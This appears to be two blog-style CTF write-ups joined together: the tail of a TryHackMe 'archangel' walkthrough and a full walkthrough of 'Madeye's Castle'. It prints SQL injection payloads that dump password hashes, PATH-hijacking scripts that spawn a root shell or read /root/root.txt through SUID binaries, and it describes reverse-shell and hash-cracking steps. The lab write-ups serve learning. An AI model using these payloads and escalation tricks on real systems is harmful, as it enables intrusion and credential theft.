Now this is a very basic shell, with no tab-auto completion or Ctrl-c to stop current process. Ctrl-c on this shell and it will kill the connection, it has happened to me, and man was getting the connection back a bitch. ANYWAY, let’s upgrade the shell before proceeding.

python3 -c ‘import pty; pty.spawn(“/bin/bash”)’

This will give you a slightly better shell, but without those magical features. To get a fully functioning TTY shell:

Press Ctrl-z to background the current shell, then on your terminal type:
stty raw -echo; fg <enter><enter>

Then on your shell:

stty rows 16 columns 136
export TERM=xterm-256color (if you don’t do this step, you won’t be able to open the text editor)
reset

And you’ll feel right at home…. or maybe not.

Getting the user flag was easy, just go to the archangel directory, and cat the user.txt file.
Now, escalating our privilege, there was a folder named myfiles, in which there was a file called password backup, when I outputted the file it had a link to a YouTube video. If you have done any amount of CTFs, you very well know where this is leading up to. A “Rick Astley — Never Gonna Give You Up” video. I swear to god, if I see this video one more time. See man, no offense but this meme has been going on for too long, and at this point it is just painful to watch. Moving on. There was another folder by the name secret, but I didn’t have the permission to open it.

I tried running sudo -l, but since I didn’t know password to www-data, this wasn’t an option. Next, I tried to a binary with SUID bit, no luck there either. Next, I looked for some cronjobs that might be running, but nothing was.
After exhausting all my options, I tried looking for any interesting files user archangel may own. Using the find command:

find / -user archangel -type f 2>/dev/null | grep -v /proc

Here, /: specifies the directory from where to begin searching(root in this case), -user: only show files owned by particular user, -type: specify what to find, 2>/dev/null: This option is a little complex in its entirety, so just understand this, it will hide any error during the execution of this command. |: pipes the output of the left command, as an input to the right command. grep: to grab a particular pattern from a given input, -v: to hide the specified pattern.

And we finally! find something interesting, a bash script owned by the user. If we can modify the file we can maybe see what’s inside the secret folder. We did have the permission to write in the script, but when I tried cd’ing into the secret directory, permission was denied, and no matter what I did, I couldn’t see the contents of the folder. So, I tried getting a reverse shell on my machine. Changing the file to a python executable, and using the reverse shell from swisskyrepo.

I executed the file and got a reverse shell as…. www-data. That’s a lot of work, just to fail isn’t it. Just for the sake of it, I tried running it as the user archangel sudo -u archangel ./helloworld, because there wasn’t anything else to do really, first it asked for www-data’s credentials, thinking it was the wrong way to go about it, I pressed Ctrl-c to exit, and I got a reverse shell back…. as archangel?.

I was surprised to say the least, I don’t think this was the intended route, I’ll update the article when I get to know about it. Until then, let’s move on.

Update: Okay, it looks like I just ignored the crontab output, apparently there was a cronjob running every minute, executing helloworld.sh as the user archangel. That was the reason why I got the reverse shell back. If you’re wondering what a cronjob is, let me explain to you in brief. Basically, Cron is a time-based job scheduler which is preinstalled in every Unix based distribution. Using Cron, you can schedule some menial tasks which you would like to be executed after a certain amount of time, you can also specify which user the said job will be running as, archangel in the case above. These repeating tasks that Cron performs are called cronjobs, and can be viewed in the file /etc/cronjob.

After getting the privilege escalation, I cd’ed into the secret directory and got the second flag. Also, I understood the real way to do it, as it was very clearly mentioned in the flag. Eh, what’s done is done amirite. No, no, worry not, I’ll update the article when I do it the right way.

In the secret folder, apart from the flag, there was also a binary executable file, with a SUID bit. I exported the file to my computer for further inspection.
Opening the file using Ghidra, and de-compiling the main function, the binary was making a system call to the cp function, and the binary was running as root, this would mean if I can somehow replace the system cp binary with my own, I can get root access.

To do that, first create a file called cp in the secret folder(or any folder, just remember to set the PATH variable correctly). Inside the cp folder, set the payload to:

#!/bin/bash
bash -p

And give it executable permission(chmod +x cp just in case you were wondering). This will give you root access when executed. Next, set the PATH variable using:

export PATH=$PWD:$PATH

I did this so that system will first check for the cp file in this directory, instead of going to the system defined cp file.
I executed the binary, got the root access and solved the box.

If you have any suggestions, do let me know in the comments.
Have a nice day.

You can find this room here: https://tryhackme.com/room/madeyescastle

Overview

This is a medium rated boot2root box, made by TryHackMe user madeye. This is a very interesting box with some new concepts. Firstly, this box uses a method called Virtual Domain Name Hosting (which I go over, briefly in the associated section). Secondly, Mutating a word-list using different rules and getting the password. Exploiting a binary through GTFObins, to escalate privileges. And finally, getting the root flag by exploiting a system call of a SUID binary. Also, the SQLi can’t be done using an automated tool, so you’ll have some trouble if you’re not used to manual injection. All in all, an awesome box which I had fun rooting. Without any further ado, let’s get into it.

Let’s Break In!

First things first, always start with an Nmap scan:

sudo nmap -sS -sV -sC -oA nmap/castle 10.10.137.43 -vv

Here -sS: SYN Scan, -sC: for “Safe” Scripts, or default scripts, -sV: for version enumeration, -oA: output in all format(Greppable, XML and default Nmap output), -vv: for verbose.

We see that 4 ports are open in this box. While the Nmap scan is running, let’s visit the service open on the port 80, which is a reserved port for HTTP. On opening the website, we are greeted with an Apache server default page.

Nothing interesting here, so let’s run a directory brute force. Any brute forcing tool will work, I prefer to use Gobuster.

gobuster dir -u http://10.10.137.43 -w /usr/share/seclists/Discovery/Web-content/raft-small-directories.txt -x php --threads 50 -o gobuster.out

Here, dir: to specify directory brute-forcing, -u to specify the target URL, -w to specify the word list, I use raft-small-wordlist. It is included in the sec-lists over at GitHub, which you can clone in your own distro, and I recommend that you do, because they are very useful. Otherwise you can just download this particular word list from here. -x: to specify the extension. This switch will add a .php after every word to check if a file also exists. You can specify multiple file types, separated by a comma. — threads: to specify the number of requests made at a time. Use this switch very cautiously, as in the real world, huge number of request to a website will get you blacklisted. Since this is a virtual environment, it shouldn’t be a problem. -o: to specify the output file.

Gobuster got a hit on a directory with the name backup. Let’s check it out.

On visiting the directory we see that we are not authorized to view the root directory. So, let’s just brute force this URI to see if we are able to find something interesting here.

gobuster dir -u http://10.10.137.43/backup -w /usr/share/seclists/Discovery/Web-content/raft-small-directories.txt -x php --threads 50 -o gobuster.out

We see that we got a hit inside the backup directory, we can see a directory called email. On visiting the directory, we see its a text file, with some interesting information in it. Its a conversation between two people, talking about virtual hosting. There is also a link provided at the bottom of the document if you want to know what virtual hosting is, or more specifically what virtual domain name hosting(that is used in this box) is, and how it is used. But, in simple terms, virtual domain name hosting is a method for hosting multiple domain names on a single server. Why is this used, because you can host two(or more) different websites using the same IP address, saving cost of having to buy multiple IP addresses.
So, we know that this particular box is using virtual domain name hosting and that the name the of other domain is hogwarts-castle.thm.

Now, to visit this particular website, we have two options(that I know of):
1. You can proxy your traffic through Burp, or any other proxy of your choice, make a request to *THM Box Ip* (10.10.137.43 in my case), intercept the traffic, and change the host header from *THM Box Ip* to hogwarts-castle.thm. The drawback with this method is that every time you want to make a new request you have to change the host header to the domain name, or else your browser will throw an error as it won’t find the host.
2. The Second, and the easier method, is to edit your hosts file. If you are using a Linux based distro, your hosts file will be located in the /etc directory. Open you /etc/hosts file in a text editor and in the IPv4 section add the *THM Box IP* and the domain name, separated by a space. Now, whenever you enter the domain name, your browser will automatically route you to the desired location.
Let’s go to hogwarts-castle.thm.
When we go to the website, we are yet again greeted by the same default webpage. It seems we made a mistake somewhere. On reading the email again, we see that the actual domain name granted was hogwartz-castle.thm instead. Making the required changes in our hosts file, and visiting the domain again, we are greeted with a login page.

Doing a simple SQLi check on the webpage using SQLMap shows that the page might be SQLi vulnerable, but there was no success. So, I decided to try some simple payloads on my own. Using the payload

”user=admin’ or 1=1 --&password=admin”

we get a response back saying that the password for “Lucas Washington is incorrect”. The username was leaked. This means we are on the right track. Wonder why the SQLMap didn’t work. I decided to give SQLMap another try. Still no luck, it would appear that the queries sent by SQLMap ̶a̶r̶e̶ ̶b̶e̶i̶n̶g̶ ̶b̶l̶o̶c̶k̶e̶d̶ ̶b̶y̶ ̶a̶ ̶W̶A̶F̶(Web-Application Firewall)(They weren’t actually). SQLMap provides us with an option to get around this by adding --tamper=space2comment in our SQLMap request.
After bashing my head against the wall with SQLMap, I understood that this technique won’t work. So, I decided to take a different route.

Lets take a step back and see what else we found using Nmap. We can see that port 445 is listening, which is the default samba share port. I connected to this port using smbclient, using anonymous login. But it failed, so I used Nmap scripts to enumerate this port further. Using Nmap we found that the shared folder was named samba share, and not anonymous. Logging in through smbclient, we see that two documents are shared “.names.txt” and “spellnames.txt”, we get both of those documents for further inspection.

One document contains “spell names” as the name suggests, possibly passwords for ssh, and the other document contains two names Hagrid and Hermonine. This I thought was a typo, correcting the spelling and trying to brute-force the SSH through the password list using Hydra was…. unsuccessful. Trying the other 2 usernames, nothing happened. At this point the only feasible option we have left is somehow exploiting the SQLi. Since SQLMap failed to do that for us. I decided to go the manual route. SQLMap already provided us with a payload, so I decided to try it using burp repeater. Using the payload, we see that payload values are reflected in the output, it is clear that we can control the output, which means we can pass functions to it and get data back.

Now this part took me a loooooot of time, not that this was insanely hard, but just because I am not very good at SQLi’s. Currently.
Anyhow, after some hours of researching I finally constructed a payload

‘ union select group_concat(password),2,3,4 FROM users-- -

This payload reflected the password hashes of different users in the database. Finally. Running one of the hash through Haiti, we get to know that these are sha-512. Trying to crack the hashes through john and using the rock you word-list, we find no passwords. Looks like we missed something. So I ran my SQLi payload through burp intruder, replacing “password” with some common server side variable names, using the default burp wordlist, and sure enough we got some more information, user names, and notes. On further inspection of notes, one thing stands out. The second user has a hint to his password.

My password used best64

Huh, the name of this user was “Harry Turner”. Inputting this name in the user field of the login form, displays the same message. Which would mean that the second hash of the password list, is this users password. best64 sounded a lot like base64, so I converted each line from “spellnames.txt” to it base64 counterpart and used this list to crack the hashes, but that was Plain-wrong (sorry for the awful pun). After some Google-fu, it was clear that best64 is a mutation technique, and that hash-cat already has it. Using the pre-built best64 rule in hash-cat on the password, we crack it.

Finally logging into the website, we found that Harry is reusing his passwords. Thanks to the very conveniently placed message. This means we got access to the machine. Upon SSHing into the machine we are greeted by a message.

Also, we got our first flag.

Next, escalating priveleges. Running sudo -l we see that user hermonine can run pico with escalated privileges. To GTFObins we go. Following the instructions there, we are now user hermonine. And, we got the second flag. That was easy.

And if you are wondering why your shell and my shell look so different, I just upgraded this shell using

python3 -c ‘import pty; pty.spawn(“/bin/bash”)’ 

And you’ll be back on track. If it still feels weird, do this

stty rows 13 columns 136
reset

Now, for the root flag. Since, we don’t know the password for user hermonine, sudo is out of the question. Next logical step will be to find a file with a SUID bit set.

find / -perm -u=s -type f 2>/dev/null

Here, /: specifies the directory from where to begin searching(root in this case), -perm: only show files with a particular permission, -type: specify what to find, 2>/dev/null: This option is a little complex in its entirety, so just understand this, it will hide any error during the execution of this command.

Everything else is just routine, except a file named swagger. Executing this, it asks us to guess a number, and then outputs a random number if we are wrong. I saw this and immediately my mind went to a buffer-overflow exploit . But to confirm my thesis, I need to see the internals of this program. So I exported this file to my machine using netcat, I usually prefer python, but it was not working correctly on this machine for some reason.
I opened the file using Ghidra.
It would appear that if we guess the number correctly the program makes a system call to *uname -p*. It appears that the binary is can be exploited using spoofing techniques. But, that means no buffer-overflow. Aww, sad programmer noises.

The main issue in exploiting this binary, lies with guessing the random number. After some researching, I found out that the function “rand()” used for random number generation was unsafe, as it displayed the same number if called in quick succession. This was very easy to confirm, using bash.

for i in {1..5};do echo 1 | ./swagger ; done

With that out of the way, we can start fooling the system. First, we create a file called uname (because the program calls a system file with the same name) in the same directory, with

cat /root/root.txt

as the payload. We give this file executable permission. This will output our flag. We add our pwd(present working directory) to the beginning of PATH environment variable, so that system will first check for the uname file in this directory, using

export PATH=/srv/time-turner:$PATH

Now, we will execute the program passing any number to it, grep the output number, and pass it back to the program, so that it successfully executes.

echo 0 | ./swagger | awk ‘{print $5}’ | tail -1 | ./swagger

This command will help us achieve that. I can’t show you the output of this command as it contains the flag. But trust me, this works.

This was my first write-up, so I hope you enjoyed it. If you have any suggestions, do let me know in the comments.
Have a nice day.